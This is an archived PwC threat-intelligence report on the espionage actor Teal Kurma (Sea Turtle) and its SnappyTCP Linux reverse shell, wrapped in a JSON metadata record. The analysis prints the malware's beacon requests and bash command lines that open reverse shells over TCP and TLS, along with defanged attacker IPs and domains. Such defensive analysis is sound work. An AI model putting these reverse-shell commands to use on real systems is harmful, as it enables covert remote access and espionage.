{ "id": "a34b559a-aa3c-4517-a8c9-7d856cd366a0", "created_at": "2026-04-06T00:18:18.344963Z", "updated_at": "2026-04-10T13:12:56.781503Z", "deleted_at": null, "sha1_hash": "c99e09523fb2cacb10decce518ca596898376fb4", "title": "The Tortoise and The Malwahare", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 337799, "plain_text": "The Tortoise and The Malwahare\r\nBy PricewaterhouseCoopers\r\nArchived: 2026-04-05 19:58:39 UTC\r\nThe Author component that should be used here will be made available later\r\nBy PwC Threat Intelligence\r\nRevisiting an elusive espionage threat actor known as Teal Kurma (a.k.a. Sea Turtle) that faded after public\r\ndisclosure over three years ago, by analyzing its malware dubbed 'SnappyTCP', a simple reverse shell for\r\nLinux/Unix systems\r\nExecutive summary\r\nPwC has continued to track a highly capable Türkiye-nexus threat actor threat actor, known as Teal Kurma (a.k.a.\r\nSea Turtle, Marbled Dust, Cosmic Wolf). As reported in our 2020 Year in Retrospect publication, Teal Kurma\r\nfocuses primarily on targeting throughout Europe and the Middle East1. Those targets are inclusive of both private\r\nand public sector organizations, from non-governmental organizations (NGO) to information technology (IT) and\r\ntelecommunication sectors. The threat actor has since continued to target similar sectors but has altered its\r\ncapabilities in a likely attempt to evade detection.\r\nIn this blog, we will detail Linux/Unix malware samples previously not discussed publicly that PwC has named\r\n“SnappyTCP”. The following are the key points of our analysis:\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 1 of 14\n\nBetween 2021 and 2023, the threat actor has used SnappyTCP, a simple reverse TCP shell for Linux/Unix\r\nthat has basic C2 capabilities and is also used for establishing persistence on a system;\r\nThere are at least two main variants; one which uses plaintext communication and the other which uses\r\nTLS for a secure connection;\r\nThe threat actor has highly likely used code from a publicly accessible GitHub account, and we assess with\r\nrealistic probability that this account is currently controlled by the threat actor; and,\r\nPivoting on infrastructure associated with the threat actor, we identified multiple domains resolving\r\nthroughout 2023 that are spoofing NGOs and Media organizations, both of which are consistent with this\r\nthreat actor's targeting motivations. These motivations center on conducting espionage for the collection of\r\ninformation that can then be exploited for surveillance purposes, or to gather traditional intelligence about\r\nthe activities of specific targets.\r\nBackground\r\nTeal Kurma, a Türkiye-nexus threat actor2, was highly active between 2018 and 2020 before seemingly\r\ndisappearing from open source reporting.3, 4 At the time of this heightened activity, the threat actor was involved\r\nin conducting large scale and prolonged Domain Name Server (DNS) hijacking attacks. DNS hijacking is when a\r\nthreat actor manipulates how DNS queries are resolved, resulting in users being redirected to malicious websites.\r\nSince then, Teal Kurma has altered its tactics to include additional tools, which are still in use at present, to\r\nachieve its espionage focused actions on objectives.\r\nSnappyTCP\r\nAccording to open source research, the threat actor has historically focused on exploiting vulnerabilities for initial\r\naccess since at least 20175. We assess that Teal Kurma has likely continued leveraging major CVEs in its current\r\ncampaigns, particularly ones with publicly available proof-of-concept code such as CVE-2021-44228, CVE-2021-\r\n21974, and CVE-2022-0847. Once inside a network, the threat actor runs a shell script (upxa.sh) that drops an\r\nexecutable to disk which calls out to a threat actor controlled web server.\r\nSHA-256 f8cb77919f411db6eaeea8f0c8394239ad38222fe15abc024362771f611c360f\r\nFilename upxa.sh\r\nFile type Shell Script\r\nFile size 179 Bytes\r\nThe webshell is a simple reverse TCP shell for Linux/Unix that has basic C2 capabilities, and is also likely used\r\nfor establishing persistence. There are at least two main variants; one which uses OpenSSL to create a secure\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 2 of 14\n\nconnection over TLS, while the other omits this capability and sends requests in cleartext.\r\nSHA-256 aea947f06ac36c07ae37884abc5b6659d91d52aa99fd7d26bd0e233fd0fe7ad4\r\nFilename _con\r\nFile type ELF\r\nFile size 8,717 Bytes\r\nThe above sample is an example of the non-TLS variant, in which the malware first opens a file named \"conf\" and\r\nreads the first 256 bytes into a buffer and then parses an IP from that buffer. The IP connects via a TCP socket by\r\nsending the following command:\r\nGET /sy.php HTTP/1.1\\r\\nHost: %s\\r\\nHostname: %s\\r\\n\\r\\n\", host_name, host_name \r\nThe domain hosting the mentioned sy.php file was observed on the following URL, as early as July 2021,\r\nhxxp://lo0[.]systemctl[.]network/sy.php. This also happens to be a subdomain mentioned in a 2022 Greek CERT\r\nalert for malicious activity indicating its potential use over a sustained period6. Many of the other network\r\nindicators from that CERT alert are assessed to be related to SnappyTCP activity, and proved useful for pivoting\r\non to find more recent infrastructure from 2023, as discussed below.\r\nThe malware then checks for the substring \"X-Auth-43245-S-20\" in the HTTP request, and then checks for\r\n\"\\r\\n\\r\\n\", before spawning the TCP reverse shell. The reverse shell is created using a pthread which launches the\r\nfollowing:\r\nbash -c \\\\\"./kdd_launch exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:%s:%d 2\u003e\u00261\u003e/dev/null\u0026\\\\\"\r\nAn example of what the HTTP network response looks like, can be seen in the following data capture output:\r\nUser-Agent: curl/7.29.0\r\nHost: lo0[.]systemctl[.]network\r\nAccept: */*\r\n%HTTP/1.1 200 OK\r\nDate: [Omitted]\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nX-Auth-43245-S-20: True\r\nContent-Length: 45\r\nContent-Type: text/html\r\ncharset=UTF-8\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 3 of 14\n\ncurl [Threat Actor IP Addresses]\r\npython\r\nTaking a closer look at additional samples, we can see a minor difference than those already mentioned.\r\nSHA-256 1ac0b2e91ba3d33ed6b8cd90f5c1f63454bfdf7aad7dbf4f239445f31dfc6eb5\r\nFilename [bioset]\r\nFile type ELF\r\nFile size 14,584 Bytes\r\nIn the other samples, which use OpenSSL and TLS certificates for a more secure connection, the malware\r\nconnects to an IP parsed from the conf file and sends:\r\nGET /ssl.php HTTP/1.1\\\\r\\\\nHost: %s\\\\r\\\\nHostname: %s\\\\r\\\\nConnection: close\\\\r\\\\n\\\\r\\\\n\r\nIn a similar fashion to previous samples, it spawns a pthread that calls bash and runs an executable, except this\r\ntime it calls a different one named ‘update’ compared to the previous ‘kdd_launch’:\r\nbash -c \\\\\"./update exec:'bash -li',pty,stderr,setsid,sigint,sane OPENSSL:%s:%d,verify=0\r\n2\u003e\u00261\u003e/dev/null\u0026\\\\\"\r\nAdditional malware insights\r\nWe observed that many of the binaries for SnappyTCP are often compiled with different toolchains, as shown in\r\nTable 1. Additionally, the GNU C Library (GLIBC) has been observed statically linked into the binary which\r\noffers the malware developer the ability to keep everything self contained while not needing to link against the\r\nlibrary files directory on the target machine. The method for running the code differed, with some cases having a\r\nfinal output as an executable or a shared object file.\r\nMD5\r\nExecutable or\r\nShared Object\r\nArchitecture\r\nType\r\nOperating System\r\nVersion \r\n102d8524f21d1b6b0380c817a435e9a7 DYN AMD64-64 Debian 10.2.1-6\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 4 of 14\n\n80aa20453ca295467bff3f8708a06280 DYN 64-64 Debian 10.2.1-6\r\n122b56b4474f93d496dee79d939c58f4 EXEC 386-32 Red Hat 4.1.2-52\r\n2a684c83401ec4706f81bf4a3503e096 EXEC 386-32 Red Hat 4.8.5-39\r\n19021c37d8adda5fa509dd242629cd50 EXEC AMD64-64 Red Hat 4.8.5-39\r\n8640f22e5a859ea2216d0e9dacef4f50 EXEC AMD64-64 Red Hat 4.4.7-23\r\nTable 1 – Overview of build artifacts for several SnappyTCP samples\r\nSince the properties of an ELF file do not have compile dates, we could not link the variations in toolchain (e.g.,\r\nArchitecture types, Operating Systems, etc) usage to an evolution of the malware over time. There are at least two\r\npossible reasons for the variations, which are not necessarily mutually exclusive. One potential theory for the wide\r\nvariation in toolchains is that there are multiple developers compiling malware for the threat actor. The second\r\ntheory is that the samples are compiled by one developer, but they are cross-compiling source code for different\r\narchitectures. The first theory could speak to the scale of operations, while the second theory lends more towards\r\nthe threat actor's specific targeting needs.\r\nIn our analysis we also discovered that the reverse TCP shell has practically identical code to a publicly accessible\r\nGitHub repository.\r\n7\r\n The code observed on GitHub has only one slight difference in the TLS variant seen with Teal\r\nKurma. The executable called by the pthread that spawns a bash process in Teal Kurma’s sample is called ‘update’\r\ninstead of ‘connector’ as seen in the GitHub repository.\r\nFurther observations show other samples in the repository that are used to establish reverse shells, either over TCP\r\nor UDP, often containing IP addresses suspected of being associated with Teal Kurma activity. It is unclear if the\r\nthreat actor controls this account or is simply abusing a third party's code. Given the overlaps between both the\r\ncode and IP addresses, there is a realistic probability that the threat actor is in control of this account at present. It\r\nis highly plausible that the threat actor is also using other code observed on this GitHub, particularly some of the\r\nproof-of-concept exploit code for major vulnerabilities, such as CVE-2021-21974 or a ESXi OpenSLP heap-overflow vulnerability.\r\nInfrastructure\r\nIn addition to analyzing the mentioned samples, we pivoted on the HTTP GET request of SnappyTCP and the\r\npreviously mentioned open source reporting on Sea Turtle, including the 2022 Greek CERT alert, to find more\r\nsuspected Teal Kurma infrastructure. For example, one of the observed HTTP GET requests matched with\r\nhxxp://108.61.103[.]186/sy.php. Pivoting on the 2022 CERT infrastructure also proved useful in identifying\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 5 of 14\n\nadditional and recent infrastructure, such as the domain ybcd[.]tech. According to pDNS records for that domain,\r\nthe following infrastructure is linked and still active at the time of writing: 168.100.10[.]187 and 93.115.22[.]212.\r\nFigure 1 – Some of the pivots made to identify additional and more recent infrastructure\r\nAs we continued to map out this infrastructure, we noticed several suspicious TLS certificates and associated\r\nnames which correspond to domains spoofing very particular organizations. The below table shows that the\r\ndomain names spoof organizations operating in both the Media and NGO sectors. All of which are catering to\r\naudiences within the Middle East, and in some cases, specific regional or ethnic groups.\r\nCertificate IP Domain Spoofing\r\nb7342137986f24f4d848409d223ad8\r\ndb38366e90f8ba865fb6e090ca20c6318a\r\n168.100.8[.]245 alhurra[.]online\r\nA US government-owned Arabic-language\r\nTV channel\r\ncbf4263d62c199cd6c0ff39dcb07b497097\r\n5ca75a16d1eae1fccdccc44f9dc98\r\n168.100.9[.]203 al-marsad[.]co\r\nA NGO in the Golan\r\nHeights that is focused\r\non Arab human rights\r\ne3a58bc8891b2ed3b6bf8ce415d169bf96\r\n3e039be165ba3dcdd2a73c6c342456\r\n31.13.195[.]52 anfturkce[.]news A Kurdish news agency\r\nTable 2 – Suspicious TLS certificates observed via pivoting\r\nMotives and Targets\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 6 of 14\n\nThe motivation for this threat actor is almost certainly to collect information that can further some type of\r\neconomic or political interest, but the focus is on conducting espionage.8 The use of the described reverse shell is\r\nto assist the threat actor in its overall actions on objectives of collecting and exfiltrating sensitive data. A closer\r\nlook at victimology helps to assess the type of data sets this threat actor is interested in.\r\nThe threat actor focuses on targeting governments, telecommunication, and IT service providers. Each one of\r\nthese sectors hold a variety of high value information. For example, organizations in the telecommunication sector\r\nhold data on its customers, which depending on the provider, may be metadata around connections to websites, or\r\ncall logs. While technology companies themselves may be targeted in supply chain and island hopping attacks,\r\nparticularly where they provide services (including IT and cyber security) to customers. This kind of information\r\ncan then be exploited by the threat actor for surveillance purposes, or to gather traditional intelligence about the\r\nactivities of specific targets.\r\nAdditional sector targeting that aligns with such purposes include the NGO and Media \u0026 Entertainment sector,\r\nboth of which this threat actor has also shown an interest in, according to the mentioned TLS certificates.\r\nGeographically, the targeting assessed off the TLS certificates shows the Middle East and North Africa region,\r\nwhile some of the SnappyTCP activity is highly likely focused on European countries, particularly those located in\r\nthe Mediterranean. This described targeting helps support attribution of the threat actor, in addition to providing\r\ninsights into its priority relevance for organizations that might be operating in a similar geography or sector.\r\nRecommendations\r\nPwC recommends searching historical logs and configuring alerting for the indicators or detection content\r\nprovided in this blog. If any of these indicators are discovered, or detection content generates alerts, we\r\nrecommend organisations investigate their origin and conduct forensic analysis. If there are no significant\r\nfindings, we recommend blocking the provided malicious indicators.\r\nOverview of TTPs\r\nMore detailed information on each of the techniques used in this blog, along with detection and mitigations, can\r\nbe found on the following MITRE pages:\r\nTactic Technique ID Procedure\r\nExecution\r\nCommand\r\nand Scripting\r\nInterpreter:\r\nUnix Shell\r\nT1059.004\r\nSnappyTCP uses Unix (e.g., bash) as a command prompt, as\r\nseen here: “-c \\\\\"./kdd_launch exec:'bash -\r\nli',pty,stderr,setsid,sigint,sanetcp:%s:%d2\u003e\u00261\u003e/dev/null\u0026\\\\\"\r\nPersistence Server\r\nSoftware\r\nT1505.003 SnappyTCP is a reverse web shell that establishes persistence\r\non a system. \r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 7 of 14\n\nComponent:\r\nWeb Shell\r\nCommand\r\nand\r\nControl\r\nApplication\r\nLayer\r\nProtocol:\r\nWeb\r\nProtocols\r\nT1071.001\r\nSnappyTCP uses HTTP as part of its GET requests for\r\ncommand and control communications.\r\nCommand\r\nand\r\nControl\r\nNon-Application\r\nLayer\r\nProtocol\r\nT1095\r\nSnappyTCP uses TCP for command and control\r\ncommunications.\r\nAppendix A – Indicators of compromise\r\nIndicator Type\r\naea947f06ac36c07ae37884abc5b6659d91d52aa99fd7d26bd0e233fd0fe7ad4 SHA-256\r\nae89540cdfb11b0c9ebda8cfdf8f5e27ba8b729c46abc395a0e1e8bb99b00c54 SHA-256\r\nfb02a6ca9d4f80ba9832ca22eec4d58233929ad952805030fd9da276714dabca SHA-256\r\nd0a7d18e283f80d456ab57fe4d986ef1f020f9c3293ae640b7d8976a694c1757 SHA-256\r\n984f3e8af0c59cfa918319e3b813d75be4277a9765201bd14a9be9ee6b008d34 SHA-256\r\n86b13a1058dd7f41742dfb192252ac9449724c5c0a675c031602bd9f36dd49b5 SHA-256\r\n77a2466a89ed1d83c700d313395c4d10345d6d7f3e1fd294c6eb111b218422a3 SHA-256\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 8 of 14\n\n6b8a6c28f7a8df5e226ce853230bb667316e2eae136e64edd6e44f5648683f11 SHA-256\r\n67647f0226e29ada304e476d4e9d35b4ac916c584b1768eb5127bd0df1818707 SHA-256\r\n6650c6971d6e7927efad09b215426a442c6342dd22f073972021d8e81a3ba124 SHA-256\r\n47c4e2c71e5caa2e0aeb3ed7a3f0d2c482c6acc19e82bac5d7821aa6ef9e735a SHA-256\r\n405b2c867408f4dc6583109cbc21bac0e78f2f0e6c45013d1c9811a6f0b99a81 SHA-256\r\n3c9e4ba1278b751c24f03ba39cb317b1bc51d2dc5173b0a0b201bc62fdc2c6fd SHA-256\r\n1695a1adb142d4da4830654c72796fc33d1e8ab9af03de85b7d6ef3e959985ab SHA-256\r\n15528410418d246a085044c67f431397d159d64003f13145b68287e7a68e805a SHA-256\r\n29f82ca8b268b1b74e22e05ef85e64cf7cf96751e494a07fe8ef96046e39dc26 SHA-256\r\n293703318fab4ad56124d37e6c93d1aecbce4c656782c40fce5d67f3b4149558 SHA-256\r\n276b1cecbd4ab24bbd47c23558143bdf905440c7045a7ff46a49d80b341c2cd5 SHA-256\r\n30eb5c522a29a1aad4c55cccadcbfd335beed648904f13b25379f23536404803 SHA-256\r\n1ac0b2e91ba3d33ed6b8cd90f5c1f63454bfdf7aad7dbf4f239445f31dfc6eb5 SHA-256\r\nddcc23f81362bb394e0ee66fda549a1523860b3b SHA1\r\nda64b83c2998212bbf77862e17d3564a0745f222 SHA1\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 9 of 14\n\nd4ca42e06e5803a5c3bf35c52c0a7b9408356ac3 SHA1\r\nc8d8a7bfe27be6087685495726593d7f6168e94c SHA1\r\nc418180c7233233364bb223a2ba621b167bfb503 SHA1\r\nc17928c00a9dad1a6455eaa490355dd311f6d88f SHA1\r\nbce355f628fcd7aec82a2f33e8af3bd87b6a33d8 SHA1\r\nae78ba9e5dad29ac910996a0c5d34684cedfe3f7 SHA1\r\n9c3f19a8a0824fc9745b5b8dd86f660a1e186d52 SHA1\r\n922bab717a9b21dc3510ba96e0c3e4a93296e934 SHA1\r\n87f4775c29b47617c0fefa984bb342a79c0ba02d SHA1\r\n700d2c7e00df8249e61ccda1fcf6f1f235dc6d23 SHA1\r\n826fe3ed0a75f5c7f093451e11588d07ff90ac81 SHA1\r\n7f8ed51d632738e3523a94ba5f94b997e922e9fe SHA1\r\n450431fd6561ea4cbb853762163f7a1544d562b8 SHA1\r\n3a5fe689d7f0ee374b1ef0b9227aecae56925e84 SHA1\r\n6557106402d71958aac007940a6cdd934e0b2336 SHA1\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 10 of 14\n\n6487e320b6294669604a61866b29ce78c3f34e69 SHA1\r\n600a3f64a619db97457231b2e654d5b4a794d2f8 SHA1\r\n514e02418468dfcad702b0e0be22fb8f9a5366bc SHA1\r\nd036adb864e46ad88dd2c1dbca62137a MD5\r\nc7e99654250bf4e3286c3ea7547a62fe MD5\r\n9ac96799b2b7a376c7a7fc3c76322556 MD5\r\n9a56d56aa24ccc75ef5709747ec5ca8b MD5\r\nbb7cd2dc1dd3bcd6932a6e75a1c95afe MD5\r\nf17985bdc165388476dd228eb927d632 MD5\r\ne69541dd97e4d4abfa33d5d4907412c6 MD5\r\ne3e4b90f9ebe829ab323e68139becf0c MD5\r\nd2a8ec0f0c4f2f015830788cec54c67f MD5\r\n4b8ac8f2d517cd9836a2578cae47fe8d MD5\r\n6f20fdd1fd6c133ef575bd36437578cf MD5\r\n2352627014f80918dde97aad963c5cf2 MD5\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 11 of 14\n\n2a684c83401ec4706f81bf4a3503e096 MD5\r\n19021c37d8adda5fa509dd242629cd50 MD5\r\n122b56b4474f93d496dee79d939c58f4 MD5\r\n102d8524f21d1b6b0380c817a435e9a7 MD5\r\n8e08c7c440bf9f5380dd614238fa2d38 MD5\r\n80aa20453ca295467bff3f8708a06280 MD5\r\n7d0d50de5aa34f7a0e8cffe06f50a5fb MD5\r\n8640f22e5a859ea2216d0e9dacef4f50 MD5\r\n168.100.10[.]187 IPv4\r\n93.115.22[.]212 IPv4\r\n108.61.103[.]186 IPv4\r\n168.100.8[.]245 IPv4\r\n168.100.9[.]203 IPv4\r\n31.13.195[.]52 IPv4\r\n45.80.148[.]172 IPv4\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 12 of 14\n\n31.214.157[.]230 IPv4\r\n95.179.176[.]250 IPv4\r\n199.247.29[.]25 IPv4\r\n185.158.248[.]8 IPv4\r\n88.119.171[.]248 IPv4\r\n146.190.28[.]83 IPv4\r\nalhurra[.]online Domain\r\nal-marsad[.]co Domain\r\nanfturkce[.]news Domain\r\nybcd[.]tech Domain\r\nud[.]ybcd[.]tech Domain\r\nsystemctl[.]network Domain\r\nlo0[.]systemctl[.]network Domain\r\neth0[.]secrsys[.]net Domain\r\naws[.]systemctl[.]network Domain\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 13 of 14\n\ndhcp[.]systemctl[.]network Domain\r\nnmcbcd[.]live Domain\r\nquerryfiles[.]com Domain\r\nupt[.]mcsoft[.]org Domain\r\nhxxp://108.61.103[.]186/sy.php URL\r\nhxxp://lo0[.]systemctl[.]network/sy.php URL\r\n1 PwC Cyber Threats 2020: A Year in Retrospect\r\n2 \r\n'Exclusive: Hackers acting in Turkey’s interests believed to be behind recent cyberattacks - sources', Reuters,\r\nhttps://www.reuters.com/article/us-cyber-attack-hijack-exclusive-idUSKBN1ZQ10X/ (27th January 2020)\r\n3 \r\n'DNS Hijacking Abuses Trust In Core Internet Service', Cisco Talos, https://blog.talosintelligence.com/seaturtle/ (17th April 2019)\r\n4 \r\n'Finding Additional Indicators With a SeaTurtle Deep Dive in Passive DNS Within DomainTools Iris’, DomainTools,\r\nhttps://www.domaintools.com/resources/blog/finding-additional-indicators-with-passive-dns-within-domaintools-iris/ (6th February\r\n2020)\r\n5 \r\n'DNS Hijacking Abuses Trust In Core Internet Service', Cisco Talos, https://blog.talosintelligence.com/seaturtle/ (17th April 2019)\r\n6 \r\n'kyvernoasfaleia-IOCs-11052022', Greek National CERT (May 2022)\r\n7 \r\nhxxps://github[.]com/jacksp7/webtest/blob/master\r\n8 CTO-SIB-20200323-01-A – Furthering Turkish state interests through cyber operations\r\nRelated Content\r\nSource: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 14 of 14\n\nMD5 Shared Object Type Version\n102d8524f21d1b6b0380c817a435e9a7 DYN AMD64-64 Debian 10.2.1-6\n Page 4 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MITRE" ], "origins": [ "web" ], "references": [ "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html" ], "report_names": [ "tortoise-and-malwahare.html" ], "threat_actors": [ { "id": "cfdd35af-bd12-4c03-8737-08fca638346d", "created_at": "2022-10-25T16:07:24.165595Z", "updated_at": "2026-04-10T02:00:04.887031Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "Cosmic Wolf", "Marbled Dust", "Silicon", "Teal Kurma", "UNC1326" ], "source_name": "ETDA:Sea Turtle", "tools": [ "Drupalgeddon" ], "source_id": "ETDA", "reports": null }, { "id": "33ae2a40-02cd-4dba-8461-d0a50e75578b", "created_at": "2023-01-06T13:46:38.947314Z", "updated_at": "2026-04-10T02:00:03.155091Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "UNC1326", "COSMIC WOLF", "Marbled Dust", "SILICON", "Teal Kurma" ], "source_name": "MISPGALAXY:Sea Turtle", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "62b1b01f-168d-42db-afa1-29d794abc25f", "created_at": "2025-04-23T02:00:55.22426Z", "updated_at": "2026-04-10T02:00:05.358041Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "Sea Turtle", "Teal Kurma", "Marbled Dust", "Cosmic Wolf", "SILICON" ], "source_name": "MITRE:Sea Turtle", "tools": [ "SnappyTCP" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434698, "ts_updated_at": 1775826776, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c99e09523fb2cacb10decce518ca596898376fb4.pdf", "text": "https://archive.orkl.eu/c99e09523fb2cacb10decce518ca596898376fb4.txt", "img": "https://archive.orkl.eu/c99e09523fb2cacb10decce518ca596898376fb4.jpg" } }